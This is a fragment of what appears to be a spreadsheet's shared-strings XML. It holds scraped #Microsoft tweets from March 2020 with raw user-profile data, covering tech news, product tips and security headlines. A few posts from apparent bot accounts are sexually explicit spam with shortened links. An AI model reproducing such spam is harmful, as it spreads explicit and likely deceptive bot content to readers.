False, 'statuses_count': 31903,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'http://pbs.twimg.com/profile_images/1174400008986275841/KPCMVamT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174400008986275841/KPCMVamT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19079050/1515073185', 'profile_link_color': 'FABBBB',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</si>
  <si>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20:11:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Revealed New Interface Of Windows 10 Start Menu With A New Icon, Replacing Live Tiles
https://t.co/enOxE7wSpQ
#Microsoft #MicrosoftTeams #tech #TechNews #TECH4ALL #TechForGood #Trending #trends #trend #LatestNews #UPDATE #Smart #SmartNews #Windows #Windows10 #NewsPicks</t>
  </si>
  <si>
    <t>{'id': 801763877960712193, 'id_str': '801763877960712193', 'name': 'AndroBliz', 'screen_name': 'trainerstechs', 'location': 'Nnewi, Nigeria', 'description': "A blog site that mostly share tech updates regarding to #tech. We've always want to build a reputable brand just like @forbes, @cnn &amp; other big organisations", 'url': 'https://t.co/mnwC4iD6P9', 'entities': {'url': {'urls': [{'url': 'https://t.co/mnwC4iD6P9', 'expanded_url': 'https://www.androbliz.net', 'display_url': 'androbliz.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1030, 'friends_count': 474, 'listed_count': 6, 'created_at': 'Thu Nov 24 12:26:19 +0000 2016', 'favourites_count': 1262, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2297, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213468446840774657/CR1-XQ4q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213468446840774657/CR1-XQ4q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/801763877960712193/1583339377',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</si>
  <si>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20:10:12 +0000 2020</t>
  </si>
  <si>
    <t>"Microsoft Edge privacy settings to change right away" https://t.co/Mxa03oF408 #Microsoft #Edge #privacy</t>
  </si>
  <si>
    <t>{'id': 282716700, 'id_str': '282716700', 'name': 'Joanne Spruce', 'screen_name': 'JoanneSpruceC21', 'location': 'British Columbia, Canada', 'description': 'about to start something new - a project with an innovative start-up. Exciting times!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4552, 'friends_count': 4117, 'listed_count': 342, 'created_at': 'Fri Apr 15 19:31:16 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 77356,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'http://pbs.twimg.com/profile_images/1208797126139867136/oLPn-vQ-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208797126139867136/oLPn-vQ-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/282716700/1577035720',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</si>
  <si>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20:10:05 +0000 2020</t>
  </si>
  <si>
    <t>Do you think there is a space for both Yammer and Teams?
#Yammer #Teams #Microsoft #MSFT
https://t.co/su5BP3zPno</t>
  </si>
  <si>
    <t>Wed Mar 04 20:09:05 +0000 2020</t>
  </si>
  <si>
    <t>Update your #Microsoft computers! Attackers are actively scanning for systems that have not been patched against the #MicrosoftExchange Server remote code execution #vulnerability that was fixed in Microsofts latest patch release https://t.co/UHbXgcuezZ</t>
  </si>
  <si>
    <t>{'id': 907617081696321536, 'id_str': '907617081696321536', 'name': 'StrongKey', 'screen_name': 'StrongKeyInc', 'location': 'Cupertino, CA | Durham, NC', 'description': 'The leader in enterprise #keymanagement infrastructure and #cybersecurity. Proud Member of the @FIDOAlliance. #MakeBreachesIrrelevant #OpenSource ðŸ™', 'url': 'https://t.co/KPYpQrVcvZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/KPYpQrVcvZ', 'expanded_url': 'http://strongkey.com', 'display_url': 'strongkey.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 417, 'friends_count': 666, 'listed_count': 11, 'created_at': 'Tue Sep 12 14:49:09 +0000 2017', 'favourites_count': 375, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1583, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206977978816770049/LeXiOykd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206977978816770049/LeXiOykd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/907617081696321536/1571406519',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</si>
  <si>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20:08:55 +0000 2020</t>
  </si>
  <si>
    <t>What do you think is a fair price for a current game controller? 
#PS4 #XboxOne #gamecontroller #Nintendo #Playstation #Sony #Microsoft</t>
  </si>
  <si>
    <t>{'id': 24231100, 'id_str': '24231100', 'name': 'Lousroom', 'screen_name': 'Lousroom', 'location': 'Staten Island, NY', 'description': 'Gamer, Tech Nerd, Entertainment, Commentator on all types of media.\nInstagram/PS4 - Lousroom', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 147, 'friends_count': 568, 'listed_count': 5, 'created_at': 'Fri Mar 13 19:13:55 +0000 2009', 'favourites_count': 2429, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12553,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'http://pbs.twimg.com/profile_images/1068699872520531969/jLMatE4q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068699872520531969/jLMatE4q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24231100/1563922285',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</si>
  <si>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Wed Mar 04 20:07:40 +0000 2020</t>
  </si>
  <si>
    <t>How do aspiring data science freelancers grab the attention of companies, successfully network with hiring agencies and find work? #microsoft https://t.co/GvtxsSwVAR https://t.co/sos0Wyv670</t>
  </si>
  <si>
    <t>Wed Mar 04 20:00:40 +0000 2020</t>
  </si>
  <si>
    <t>#coronavirusseattle continua il contagio nella citta di #Microsoft e #Amazon Coronavirus daily update, March 4: What to know today about COVID-19 in the Seattle area, Washington state and the nation https://t.co/Xrxb1pvUbn via @seattletimes</t>
  </si>
  <si>
    <t>{'id': 81656841, 'id_str': '81656841', 'name': 'Enrico Verga', 'screen_name': 'EnricoVerga', 'location': 'London ', 'description': '#strategist #analyst published on @FortuneMagazine @sole24ore @fattoquotidiano @Agenzia_Italia @formichenews #econ24 #rt NO #end. Here only pers Op', 'url': 'https://t.co/Lwes3kIQog', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lwes3kIQog', 'expanded_url': 'http://www.linkedin.com/in/enricoverga', 'display_url': 'linkedin.com/in/enricoverga', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48476, 'friends_count': 10737, 'listed_count': 1962, 'created_at': 'Sun Oct 11 18:41:04 +0000 2009', 'favourites_count': 9583, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 130171, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3C4042', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/520514464236732416/gateHGOI_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/520514464236732416/gateHGOI_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/81656841/1410073227', 'profile_link_color': 'D2691E',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</si>
  <si>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20:00:37 +0000 2020</t>
  </si>
  <si>
    <t>#Alt key makes #Microsoft #office programs more #accessible4all 
 https://t.co/PaAuLzSR0v
#UDL
#MIEExpert 
#MicrosoftOffice https://t.co/HYbsyQWC1y</t>
  </si>
  <si>
    <t>{'id': 3097165721, 'id_str': '3097165721', 'name': 'Matthew Nickerson #MSFTEduChat', 'screen_name': 'dadxeight', 'location': 'Severn, MD', 'description': 'Husband to Michele Dad to 6 boys, 2 girls #i2eEDU #BSFinternational Instructional Technology Specialist #AACPSoit #MIEExpert #PioNear Author #MSFTEduChat Host', 'url': 'https://t.co/ojU2vFRQE7', 'entities': {'url': {'urls': [{'url': 'https://t.co/ojU2vFRQE7', 'expanded_url': 'http://theother-it.com/', 'display_url': 'theother-it.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 968, 'friends_count': 1064, 'listed_count': 18, 'created_at': 'Thu Mar 19 16:48:36 +0000 2015', 'favourites_count': 2237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2873,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'http://pbs.twimg.com/profile_images/1224078901418156033/7UOoluck_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224078901418156033/7UOoluck_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3097165721/1580146599',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</si>
  <si>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20:00:35 +0000 2020</t>
  </si>
  <si>
    <t>New #Podcast is out and we're talking Business Central March 2020 news, Late Payment Prediction functionality included within Business Central, and top 10 things you need to know about Business Central Apps.
https://t.co/Qoo1uur2Xo
#MSDyn365bc #Microsoft #apps #extensions</t>
  </si>
  <si>
    <t>Wed Mar 04 20:00:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft OneNote Used To Sidestep #Phishing Detection https://t.co/9TF0KwilzQ #Threatpost</t>
  </si>
  <si>
    <t>Wed Mar 04 20:00:05 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience.  #Microsoft #Microsoft365 https://t.co/9FSTG550CY</t>
  </si>
  <si>
    <t>Wed Mar 04 20:00:04 +0000 2020</t>
  </si>
  <si>
    <t>By 2030, global demand for water will surpass supply by 40%. That's why Ecolab uses #Microsoft #Azure and #PowerBI to help customers produce better with much less water. https://t.co/JME70xmoto</t>
  </si>
  <si>
    <t>Wed Mar 04 20:00:02 +0000 2020</t>
  </si>
  <si>
    <t>"We need to have diversity in more management and leadership positions because diversity attracts diversity."  #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode https://t.co/k4K8wpRiS8</t>
  </si>
  <si>
    <t>{'id': 220833795, 'id_str': '220833795', 'name': 'Paloma Fra', 'screen_name': 'momi1505', 'location': '', 'description': 'Microsoft EU Funds Specialist', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 194, 'friends_count': 724, 'listed_count': 7, 'created_at': 'Sun Nov 28 23:48:23 +0000 2010', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1714,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'http://pbs.twimg.com/profile_images/1155254819512377345/8dBhLbfX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1155254819512377345/8dBhLbfX_normal.jpg',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</si>
  <si>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20:00:01 +0000 2020</t>
  </si>
  <si>
    <t>How To: Create Recurring and Reversing Journal Entries in Microsoft Dynamics 365 Business Central
https://t.co/nFubutMapB
#microsoft #journalentries #howto #training</t>
  </si>
  <si>
    <t>Wed Mar 04 19:59:59 +0000 2020</t>
  </si>
  <si>
    <t>AMD, #Microsoft, EY, #ChainLink, ConsenSys Announce #Ethereum Public #Blockchain Enterprise Protocol
https://t.co/mNRWhGBYky https://t.co/RqcgdaKS2u</t>
  </si>
  <si>
    <t>Wed Mar 04 19:57:05 +0000 2020</t>
  </si>
  <si>
    <t>Can't Code? You Can Still Make Your Own Apps -- Journal Report #Microsoft #Stock #MarketScreener https://t.co/q562zrMh4l https://t.co/1eti34IZ0m</t>
  </si>
  <si>
    <t>Wed Mar 04 19:54:24 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Releases PowerShell 7.0 With New Features, Update Alerts
https://t.co/Y2v7yGOcP9
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #PowerShell7.0 https://t.co/kqkGAbEFBG</t>
  </si>
  <si>
    <t>{'id': 3254411439, 'id_str': '3254411439', 'name': 'David Iannuzzi', 'screen_name': 'Rom_Duck', 'location': 'Toronto, Canada', 'description': 'I #help people with #computer #problems #Help #Cybersecurity #software  #neurodiversity #entrepreneurship', 'url': 'https://t.co/0atT1nogiH', 'entities': {'url': {'urls': [{'url': 'https://t.co/0atT1nogiH', 'expanded_url': 'https://www.youtube.com/channel/UCcw-5a0QXWPZiGeMPPuYt-g', 'display_url': 'youtube.com/channel/UCcw-5â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1126, 'friends_count': 718, 'listed_count': 153, 'created_at': 'Thu May 14 18:35:47 +0000 2015', 'favourites_count': 442, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9381,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'http://pbs.twimg.com/profile_images/612389040982102016/Wmx64DuX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/612389040982102016/Wmx64DuX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3254411439/1579277301',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</si>
  <si>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19:54:23 +0000 2020</t>
  </si>
  <si>
    <t>I want to feel your cock moving inside me. 
 #nintendoswitch #microsoft https://t.co/FTK93HCP9r</t>
  </si>
  <si>
    <t>{'id': 1235179767432974337, 'id_str': '1235179767432974337', 'name': 'Leslie Ellis', 'screen_name': 'trepenerri', 'location': 'Billings, USA', 'description': 'The first time you touched me, I knew I was born to be yours.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Wed Mar 04 12:26:28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'http://pbs.twimg.com/profile_images/1235180348113383424/xXZ1sskY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235180348113383424/xXZ1sskY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235179767432974337/1583324980',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</si>
  <si>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19:53:31 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Releases PowerShell 7.0 With New Features, Update Alerts
https://t.co/TKhQlIcJh4
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #PowerShell7.0</t>
  </si>
  <si>
    <t>Wed Mar 04 19:53:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Releases PowerShell 7.0 With New Features, Update Alerts
https://t.co/GecoEOyQQw
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #PowerShell7.0</t>
  </si>
  <si>
    <t>Wed Mar 04 19:53:21 +0000 2020</t>
  </si>
  <si>
    <t>From an Assurance Practitioner course in London today to an open clinic session on #Microsoft Project Online with a client in Glasgow tomorrow. Its time to fly!
#pmot #onthemove #busyness #lovewhatyoudo #dowhatyoulove https://t.co/G31OihfNCB</t>
  </si>
  <si>
    <t>{'id': 318394355, 'id_str': '318394355', 'name': 'Marisa Silva', 'screen_name': 'TheLuckyPM', 'location': 'Windsor, United Kingdom', 'description': 'There are no good project managers...only lucky ones. The more you plan the luckier you get.', 'url': 'https://t.co/7ycItkxLvm', 'entities': {'url': {'urls': [{'url': 'https://t.co/7ycItkxLvm', 'expanded_url': 'https://www.linkedin.com/in/theluckypm/', 'display_url': 'linkedin.com/in/theluckypm/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1081, 'friends_count': 924, 'listed_count': 29, 'created_at': 'Thu Jun 16 12:29:06 +0000 2011', 'favourites_count': 724, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4048,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'http://pbs.twimg.com/profile_images/983804534823817216/jK6zBG2v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983804534823817216/jK6zBG2v_normal.jpg',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</si>
  <si>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Wed Mar 04 19:52:02 +0000 2020</t>
  </si>
  <si>
    <t>Back to Windows 10 goodbye #apple hello #microsoft and WSL https://t.co/wRmoKGZYXR</t>
  </si>
  <si>
    <t>{'id': 198579403, 'id_str': '198579403', 'name': 'Abu Saffiyah', 'screen_name': 'abuhajar87', 'location': '127.0.0.1', 'description': 'RAK patriot, Ethical Hacker and Pentester', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 90, 'friends_count': 179, 'listed_count': 5, 'created_at': 'Mon Oct 04 17:49:56 +0000 2010', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1932,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'http://pbs.twimg.com/profile_images/378800000162893635/966340107905eb538f19ddcaf66c95e1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000162893635/966340107905eb538f19ddcaf66c95e1_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/198579403/1374362125',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</si>
  <si>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Wed Mar 04 19:51:49 +0000 2020</t>
  </si>
  <si>
    <t>How is Microsoft Teams going to be used with the impending Corona Virus threat of schools having to be run remotely. @justinchando @MicrosoftTeams @MicrosoftEDU  do you have a guide to use OneNote + Teams online. #edtech #CoronavirusOutbreak #microsoft</t>
  </si>
  <si>
    <t>{'id': 18627586, 'id_str': '18627586', 'name': 'rashantha', 'screen_name': 'rashantha', 'location': 'iPhone: 34.203709,-118.126221', 'description': 'IT Director (education). software dev., community organizer and a sri lankan mac guru, cricket heart. Founder https://t.co/ME4MtlkWdA STEAM lab. Creator QUO AOS motherboard.', 'url': 'https://t.co/UK8cLwJ1CZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/UK8cLwJ1CZ', 'expanded_url': 'http://quocomputer.com', 'display_url': 'quocomputer.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ME4MtlkWdA', 'expanded_url': 'http://roboQ.org', 'display_url': 'roboQ.org', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 586, 'friends_count': 1217, 'listed_count': 19, 'created_at': 'Mon Jan 05 08:38:57 +0000 2009', 'favourites_count': 591, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3618,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'http://pbs.twimg.com/profile_images/569272711377985536/-ckWB1iz_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/569272711377985536/-ckWB1iz_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18627586/1468088834',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</si>
  <si>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Wed Mar 04 19:51:02 +0000 2020</t>
  </si>
  <si>
    <t>Complete Microsoft Excel Course: Go from zero to hero - https://t.co/D9Y2aKMieq #Microsoft #OfficeProductivity
https://t.co/D9Y2aKMieq</t>
  </si>
  <si>
    <t>{'id': 1159792210293985280, 'id_str': '1159792210293985280', 'name': 'BlazeCoupon', 'screen_name': 'BlazeCoupon', 'location': '', 'description': 'Get Free Courses in Udemy, Free Udemy Courses Download, Free Coupons for Udemy, Udemy Coupon for Free, Udemy Courses Free and Free Coupons Udemy.', 'url': 'https://t.co/IZAal8hb2P', 'entities': {'url': {'urls': [{'url': 'https://t.co/IZAal8hb2P', 'expanded_url': 'https://blazecoupon.com', 'display_url': 'blazecoupon.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 238, 'friends_count': 221, 'listed_count': 1, 'created_at': 'Fri Aug 09 11:43:05 +0000 2019', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2189, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159792458227683330/P1ZHzn1b_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159792458227683330/P1ZHzn1b_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1159792210293985280/1567105214',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</si>
  <si>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19:50:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OneNote Used To Sidestep Phishing Detection
https://t.co/AZFlNnqDf8
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #OneNote #PhishingDetection</t>
  </si>
  <si>
    <t>Wed Mar 04 19:50:15 +0000 2020</t>
  </si>
  <si>
    <t>How to wake up so quickly masturbate pussy! I am sick?  
https://t.co/bEytgiqi5K
 #microsoft #interiordesign https://t.co/bb6fgOeeMU</t>
  </si>
  <si>
    <t>{'id': 1235276462346981376, 'id_str': '1235276462346981376', 'name': 'Tamara Williams', 'screen_name': 'doldkatoveab', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Wed Mar 04 18:50:38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'http://pbs.twimg.com/profile_images/1235277534423642113/UpCNGA7r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235277534423642113/UpCNGA7r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235276462346981376/1583348142',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</si>
  <si>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19:50:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OneNote Used To Sidestep Phishing Detection
https://t.co/NiBQzKZWsM
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #OneNote #PhishingDetection</t>
  </si>
  <si>
    <t>Wed Mar 04 19:48:18 +0000 2020</t>
  </si>
  <si>
    <t>Runaway mouse in your Microsoft Office programs? Try these easy tips to select text &amp;amp; data https://t.co/SN2Exq7tpb
#Microsoft
#Office https://t.co/YigidCvq94</t>
  </si>
  <si>
    <t>{'id': 23212700, 'id_str': '23212700', 'name': 'Dawn Bjork, MCT', 'screen_name': 'TheSoftwarePro', 'location': 'Denver, Colorado', 'description': 'Microsoft Certified Trainer #MCT, software tips &amp; techniques, #MSOffice expert, productivity speaker, author. Lover of Oxford comma, poker player, newbie golfer', 'url': 'https://t.co/O3ZsVVMJD7', 'entities': {'url': {'urls': [{'url': 'https://t.co/O3ZsVVMJD7', 'expanded_url': 'http://www.TheSoftwarePro.com', 'display_url': 'TheSoftwarePro.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2323, 'friends_count': 2561, 'listed_count': 107, 'created_at': 'Sat Mar 07 17:20:21 +0000 2009', 'favourites_count': 5184, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 40079,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'http://pbs.twimg.com/profile_images/1098590391379451904/g1AT5_S2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098590391379451904/g1AT5_S2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23212700/1532445498', 'profile_link_color': '2D388B', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '017493', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:45:45 +0000 2020</t>
  </si>
  <si>
    <t>Get your hands on next-gen solutions at the American Manufacturing Summit, where were partnering with #Microsoft to bring you the Connected Enterprise in Action. Click here for details. https://t.co/zq75JgKTOv
#MfgUS20 #manufacturing #AI #ConnectedFactory #digitaltransformation https://t.co/NNgeRei5R0</t>
  </si>
  <si>
    <t>{'id': 119394244, 'id_str': '119394244', 'name': 'eLogic', 'screen_name': 'eLogicGroup', 'location': 'Rochester, NY', 'description': 'Intelligent Business Solutions for Manufacturers. \nField Service, IoT, Analytics, Integration, AI, and Sales, Marketing &amp; Service enablement.', 'url': 'http://t.co/IYTiCz6GCP', 'entities': {'url': {'urls': [{'url': 'http://t.co/IYTiCz6GCP', 'expanded_url': 'http://elogic.com', 'display_url': 'elogic.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 469, 'friends_count': 489, 'listed_count': 53, 'created_at': 'Wed Mar 03 14:22:06 +0000 2010', 'favourites_count': 253, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1511, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'AAAAAA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/898637059749011456/JPpQzy3y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/898637059749011456/JPpQzy3y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/119394244/1531153675', 'profile_link_color': '0A9DAA', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '203536', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:45:38 +0000 2020</t>
  </si>
  <si>
    <t>The NFL and Microsoft have expanded their partnership to accelerate a digital transformation across the league but what does this really mean?
 #Microsoft #NFL https://t.co/VZ3VZMrpUz https://t.co/ENCRh4QMu2</t>
  </si>
  <si>
    <t>{'id': 862261113009954816, 'id_str': '862261113009954816', 'name': 'Gridiron Hub', 'screen_name': 'GridironHub1', 'location': '', 'description': 'Covering, analysing and supporting the growth of American Football in the UK and around the world. ðŸˆ News | Fantasy | Betting Tips | Much More ðŸˆ', 'url': 'https://t.co/k2JleIqCOk', 'entities': {'url': {'urls': [{'url': 'https://t.co/k2JleIqCOk', 'expanded_url': 'http://www.gridironhub.com', 'display_url': 'gridironhub.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1021, 'friends_count': 696, 'listed_count': 5, 'created_at': 'Wed May 10 11:00:44 +0000 2017', 'favourites_count': 362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2499,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'http://pbs.twimg.com/profile_images/1049713942262632451/K3uqP-zu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1049713942262632451/K3uqP-zu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862261113009954816/1572091304',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</si>
  <si>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19:45:17 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Releases PowerShell 7.0 With New Features, Update Alerts:" https://t.co/r8pzepiYkY
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 19:44:53 +0000 2020</t>
  </si>
  <si>
    <t>The New Microsoft Office App Looks Like A Winner
https://t.co/dtOcP50f7s
#PCProfessional #Microsoft https://t.co/Iz7tIcYKoB</t>
  </si>
  <si>
    <t>{'id': 44413716, 'id_str': '44413716', 'name': 'PC Professional', 'screen_name': 'PC_Professional', 'location': 'Oakland, CA', 'description': "San Francisco Bay Area's leader in managed IT services, outsourcing, cloud services and software integration.", 'url': 'https://t.co/8gtUCfL4pq', 'entities': {'url': {'urls': [{'url': 'https://t.co/8gtUCfL4pq', 'expanded_url': 'http://www.pcprofessional.com', 'display_url': 'pcprofessional.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 441, 'friends_count': 94, 'listed_count': 45, 'created_at': 'Wed Jun 03 17:59:20 +0000 2009', 'favourites_count': 295, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1981, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF123A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/771381686328102912/DPDSUaA-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/771381686328102912/DPDSUaA-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44413716/1472746717', 'profile_link_color': '009999',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</si>
  <si>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Wed Mar 04 19:44:31 +0000 2020</t>
  </si>
  <si>
    <t>Announcing Power BI APIs .NET SDK v3
https://t.co/rrdwdXlGoJ 
#microsoft #dotnet #technology #it # powerbi #sdk #informationtechnology #issquared https://t.co/8zYTI3S73G</t>
  </si>
  <si>
    <t>Wed Mar 04 19:42:56 +0000 2020</t>
  </si>
  <si>
    <t>Great when you're on top.
https://t.co/XPejiHrIrE
#Wichita
 #share #microsoft https://t.co/W1A8jjNiT1</t>
  </si>
  <si>
    <t>{'id': 1235273544977743873, 'id_str': '1235273544977743873', 'name': 'Jasmine Diaz', 'screen_name': 'sporolcreepsa', 'location': 'Manchester, USA', 'description': 'Every time I see you, I fall in love all over again.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Wed Mar 04 18:39:04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'http://pbs.twimg.com/profile_images/1235286188526886914/ofv5pE-7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235286188526886914/ofv5pE-7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235273544977743873/1583350218',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</si>
  <si>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19:42:15 +0000 2020</t>
  </si>
  <si>
